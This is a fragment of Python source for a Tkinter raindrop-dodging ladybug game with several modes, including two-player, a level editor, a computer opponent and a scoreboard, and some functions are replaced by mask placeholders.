twoPlayerRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts1:\n coconut.draw(canvas)\n for coconut in data.coconuts2:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n canvas.create_text(50, 40, text='Player 1', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 2', font='Arial 15 bold', fill\n ='yellow')\n winner(canvas, data)\n drawHome(canvas, data)\n\n\ndef winner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 1', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! Player 2', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef editorKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef editorMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.yourSpeed = 'slow'\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.yourSpeed = 'medium'\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.yourSpeed = 'fast'\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n checkMiddle(event, data)\n checkLast(event, data)\n\n\ndef checkMiddle(event, data):\n if data.medX - data.r <= event.y <= data.medX + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.rainSpeed = 'drizzle'\n data.drizzle = data.click\n data.rain, data.thunderstorm = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.rainSpeed = 'rain'\n data.rain = data.click\n data.drizzle, data.thunderstorm = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\n<mask token>\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 == 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\n<mask token>\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\n<mask token>\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\n<mask token>\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef init(data):\n data.score = 0\n data.mode = 'splashScreen'\n data.timerDelay = 100\n data.height = 800\n data.width = 800\n data.speed = 10\n data.speedAI = 12\n data.speedAI2 = 12\n data.switchOnProgress = False\n data.r = 25\n data.cx = 280\n data.cy = 750\n data.onLeft1, data.onLeft2 = True, True\n data.win = False\n data.coconuts = []\n data.powerUps = []\n data.coconuts1 = []\n data.coconuts2 = []\n data.coconutsAI1 = []\n data.coconutsAI2 = []\n data.invincible = []\n data.pauseDrops = False\n data.pause1Drop = False\n data.pause2Drop = False\n init1(data)\n\n\n<mask token>\n\n\ndef init2(data):\n data.tbg = PhotoImage(file='tbg2.gif')\n data.click = PhotoImage(file='click.gif')\n data.notClick = PhotoImage(file='notClick.gif')\n data.player1X = 150\n data.player1Y = 750\n data.player2X = 550\n data.player2Y = 750\n data.winner = None\n data.speed = 12\n data.speed2 = 12\n data.editorTime = 0\n data.editorDrops = []\n data.margin = 100\n data.enter = False\n data.powerUpsEditor = None\n data.yourSpeed = None\n data.rainSpeed = None\n data.slow = data.notClick\n data.medium = data.notClick\n data.fast = data.notClick\n data.drizzle = data.notClick\n data.rain = data.notClick\n data.thunderstorm = data.notClick\n init3(data)\n\n\ndef init3(data):\n data.yes = data.notClick\n data.no = data.notClick\n data.enter = data.notClick\n data.levelEditorLives = 2\n data.rSpeed = None\n data.start = None\n data.start1 = None\n data.start2 = None\n data.difficulty = None\n data.mode1 = data.notClick\n data.mode2 = data.notClick\n data.mode3 = data.notClick\n data.mode4 = data.notClick\n data.mode5 = data.notClick\n data.mode6 = data.notClick\n data.home = PhotoImage(file='home.gif')\n data.helpScreen = PhotoImage(file='help1.gif')\n data.title = PhotoImage(file='title.gif')\n data.scoreList = []\n data.spotList = [270, 364, 458, 552, 646, 740]\n data.savedScores = readFile('score.txt')\n if data.mode == 'levelCreated':\n setEverything(data)\n initsplashScreenNumbers(data)\n\n\ndef initsplashScreenNumbers(data):\n data.splashButtonY = 425\n data.p1ButtonX = 225\n data.p2ButtonX = 290\n data.edButton = 355\n data.diffButton = 425\n data.helpButton = 490\n data.sboardButton = 555\n data.hitPenalty = 75\n data.splashText = data.height / 2 - 20\n data.lives = 2\n data.levelMax = 8\n data.lane = 94\n data.Player1Min = 270\n data.Player1Max = 740\n data.homeX = 50\n data.homeY = 650\n initScoreBoardHelp(data)\n init1Player(data)\n\n\n<mask token>\n\n\ndef init1Player(data):\n data.buffer = 40\n\n\ndef initAI(data):\n data.AITY = 225\n data.easyX = 200\n data.easyY = 300\n data.medX = 400\n data.hardX = 600\n data.enterY = 450\n data.difS = 4\n data.difM = 6\n data.difH = 8\n data.last = 500\n data.enterX = 575\n data.PUT = 450\n data.RST = 350\n data.YST = 250\n\n\ndef mousePressed(event, data):\n if data.mode == 'splashScreen':\n splashScreenMousePressed(event, data)\n elif data.mode == '1Player':\n playerMousePressed(event, data)\n elif data.mode == '2Player':\n twoPlayerMousePressed(event, data)\n elif data.mode == 'editor':\n editorMousePressed(event, data)\n elif data.mode == 'levelCreated':\n levelCreatedMousePressed(event, data)\n elif data.mode == 'AI':\n AIMousePressed(event, data)\n elif data.mode == 'difficulty':\n difficultyMousePressed(event, data)\n elif data.mode == 'scoreboard':\n scoreboardMousePressed(event, data)\n elif data.mode == 'help':\n helpMousePressed(event, data)\n\n\n<mask token>\n\n\ndef timerFired(data):\n if data.mode == 'splashScreen':\n splashScreenTimerFired(data)\n elif data.mode == '1Player':\n playerTimerFired(data)\n elif data.mode == '2Player':\n twoPlayerTimerFired(data)\n elif data.mode == 'editor':\n editorTimerFired(data)\n elif data.mode == 'levelCreated':\n levelCreatedTimerFired(data)\n elif data.mode == 'AI':\n AITimerFired(data)\n elif data.mode == 'difficulty':\n difficultyTimerFired(data)\n elif data.mode == 'scoreboard':\n scoreboardTimerFired(data)\n elif data.mode == 'help':\n helpTimerFired(data)\n\n\ndef redrawAll(canvas, data):\n if data.mode == 'splashScreen':\n splashScreenRedrawAll(canvas, data)\n elif data.mode == '1Player':\n playerRedrawAll(canvas, data)\n elif data.mode == '2Player':\n twoPlayerRedrawAll(canvas, data)\n elif data.mode == 'editor':\n editorRedrawAll(canvas, data)\n elif data.mode == 'levelCreated':\n levelCreatedRedrawAll(canvas, data)\n elif data.mode == 'AI':\n AIRedrawAll(canvas, data)\n elif data.mode == 'difficulty':\n difficultyRedrawAll(canvas, data)\n elif data.mode == 'scoreboard':\n scoreboardRedrawAll(canvas, data)\n elif data.mode == 'help':\n helpRedrawAll(canvas, data)\n\n\n<mask token>\n\n\ndef splashKeyPressed(event, data):\n pass\n\n\ndef splashScreenTimerFired(data):\n data.splashScreenTime += 1\n if data.splashScreenTime % 2 == 1:\n rainDropSplash(data)\n for drop in data.splashScreenDrops:\n drop.onTimerFired(data)\n\n\ndef splashScreenButtons(canvas, data):\n canvas.create_image(data.splashButtonY, data.p1ButtonX, image=data.mode1)\n canvas.create_image(data.splashButtonY, data.p2ButtonX, image=data.mode2)\n canvas.create_image(data.splashButtonY, data.edButton, image=data.mode3)\n canvas.create_image(data.splashButtonY, data.diffButton, image=data.mode4)\n canvas.create_image(data.splashButtonY, data.helpButton, image=data.mode5)\n canvas.create_image(data.splashButtonY, data.sboardButton, image=data.mode6\n )\n\n\ndef rainDropSplash(data):\n xPosition = random.randint(0, 800)\n data.splashScreenDrops.append(Coconuts(xPosition, 0))\n\n\ndef splashScreenRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.splashText - 10, image=data.title)\n for drop in data.splashScreenDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.splashText, text=\n \"\"\"\n 1.) Single Player Level Mode\n\n\n 2.) Two-Player Mode\n\n \n 3.) Level Creator Practice Mode\n\n \n 4.) Play Against the Computer\n\n \n 5.) Help and Instructions\n\n \n 6.) Scoreboard\n\n \n \"\"\"\n , font='Arial 14 bold', fill='yellow')\n splashScreenButtons(canvas, data)\n\n\ndef writeFile(path, contents):\n with open(path, 'wt') as f:\n f.write(contents)\n\n\ndef readFile(path):\n with open(path, 'rt') as f:\n return f.read()\n\n\nclass Coconuts(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.r = 9\n self.fill = 'deep sky blue'\n self.speed = 30\n self.outline = 'blue'\n\n def draw(self, canvas):\n canvas.create_polygon(self.x, self.y - 2 * self.r, self.x - self.r,\n self.y, self.x, self.y + self.r, self.x + self.r, self.y, fill=\n self.fill, outline=self.outline, width=3)\n\n def onTimerFired(self, data):\n self.y += self.speed\n\n\ndef hit(data):\n for coconut in data.coconuts:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if coconut.y >= data.cy - data.r and coconut.y <= data.cy + data.r:\n if (coconut.x >= data.cx - data.r and coconut.x <= data.cx +\n data.r):\n data.cy += data.hitPenalty\n if data.mode == 'levelCreated':\n data.lives -= 1\n elif data.hit == False and data.level < data.levelMax:\n data.score -= data.level\n data.coconuts.remove(coconut)\n if data.mode == 'levelCreated':\n data.levelEditorLives -= 1\n\n\ndef hit2Player(data):\n if data.mode == '2Player':\n if data.Invincible1 == False:\n for coconut in data.coconuts1:\n if (coconut.y >= data.player1Y - data.r and coconut.y <= \n data.player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <=\n data.player1X + data.r):\n data.player1Y += data.hitPenalty\n data.coconuts1.remove(coconut)\n if data.Invincible2 == False:\n for coconut in data.coconuts2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= \n data.player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <=\n data.player2X + data.r):\n data.player2Y += data.hitPenalty\n data.coconuts2.remove(coconut)\n\n\nclass PowerUps(Coconuts):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.hourGlass)\n\n\ndef hitPause(data):\n for powerUp in data.powerUps:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.pauseDrops = True\n data.start = data.cy\n data.powerUps.remove(powerUp)\n elif data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.pause1Drop = True\n data.start1 = data.player1Y\n data.powerUps.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.pause2Drop = True\n data.start2 = data.player2Y\n data.powerUps.remove(powerUp)\n\n\nclass Invincible(PowerUps):\n\n def __init__(self, x, y):\n super().__init__(x, y)\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.umbrella)\n\n\ndef hitInvincible(data):\n for powerUp in data.invincible:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if powerUp.y >= data.cy - data.r and powerUp.y <= data.cy + data.r:\n if (powerUp.x >= data.cx - data.r and powerUp.x <= data.cx +\n data.r):\n data.beInvincible = True\n data.start = data.cy\n data.invincible.remove(powerUp)\n if data.mode == '2Player' or data.mode == 'AI':\n if (powerUp.y >= data.player1Y - data.r and powerUp.y <= data.\n player1Y + data.r):\n if (powerUp.x >= data.player1X - data.r and powerUp.x <= \n data.player1X + data.r):\n data.Invincible1 = True\n data.start1 = data.player1Y\n data.invincible.remove(powerUp)\n if (powerUp.y >= data.player2Y - data.r and powerUp.y <= data.\n player2Y + data.r):\n if (powerUp.x >= data.player2X - data.r and powerUp.x <= \n data.player2X + data.r):\n data.Invincible2 = True\n data.start2 = data.player2Y\n data.invincible.remove(powerUp)\n\n\nclass ScaryBug(object):\n\n def __init__(self, x, y):\n self.x = x\n self.y = y\n self.speed = 25\n\n def draw(self, canvas, data):\n canvas.create_image(self.x, self.y, image=data.spider)\n\n def onTimerFired(self, data):\n if data.mode == '2Player' or data.mode == 'AI':\n self.speed = 35\n self.y -= self.speed\n if (data.mode == '1Player' or data.mode == 'levelCreated' and data.\n time % 8 == 0):\n side = random.choice(data.sides)\n if side == 'l':\n if self.x - data.lane >= data.Player1Min:\n self.x -= data.lane\n else:\n self.x += data.lane\n elif side == 'r':\n if self.x + data.lane <= data.Player1Max:\n self.x += data.lane\n else:\n self.x -= data.lane\n\n\ndef hitScaryBug(data):\n for bug in data.scaryBug:\n if data.mode == '1Player' or data.mode == 'levelCreated':\n if (bug.y >= data.cy - 1.5 * data.r and bug.y <= data.cy + 1.5 *\n data.r):\n if (bug.x >= data.cx - 1.5 * data.r and bug.x <= data.cx + \n 1.5 * data.r):\n data.hit = True\n data.lives = 0\n data.levelEditorLives = 0\n if data.mode == '2Player' or data.mode == 'AI':\n if (bug.y >= data.player1Y - data.r and bug.y <= data.player1Y +\n data.r):\n if (bug.x >= data.player1X - data.r and bug.x <= data.\n player1X + data.r):\n data.winner = 'player2'\n if (bug.y >= data.player2Y - data.r and bug.y <= data.player2Y +\n data.r):\n if (bug.x >= data.player2X - data.r and bug.x <= data.\n player2X + data.r):\n data.winner = 'player1'\n\n\ndef drawPowerups(canvas, data):\n for bug in data.scaryBug:\n bug.draw(canvas, data)\n for powerUp in data.powerUps:\n powerUp.draw(canvas, data)\n for powerUp in data.invincible:\n powerUp.draw(canvas, data)\n\n\ndef drawHome(canvas, data):\n canvas.create_image(data.homeX, data.homeY, image=data.home)\n\n\n<mask token>\n\n\ndef powerUpCoconutShot(data):\n if data.time % 60 == 0 and data.time % 120 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 50 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 100 == 0:\n Position = random.choice(data.spotList)\n data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef playerRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n 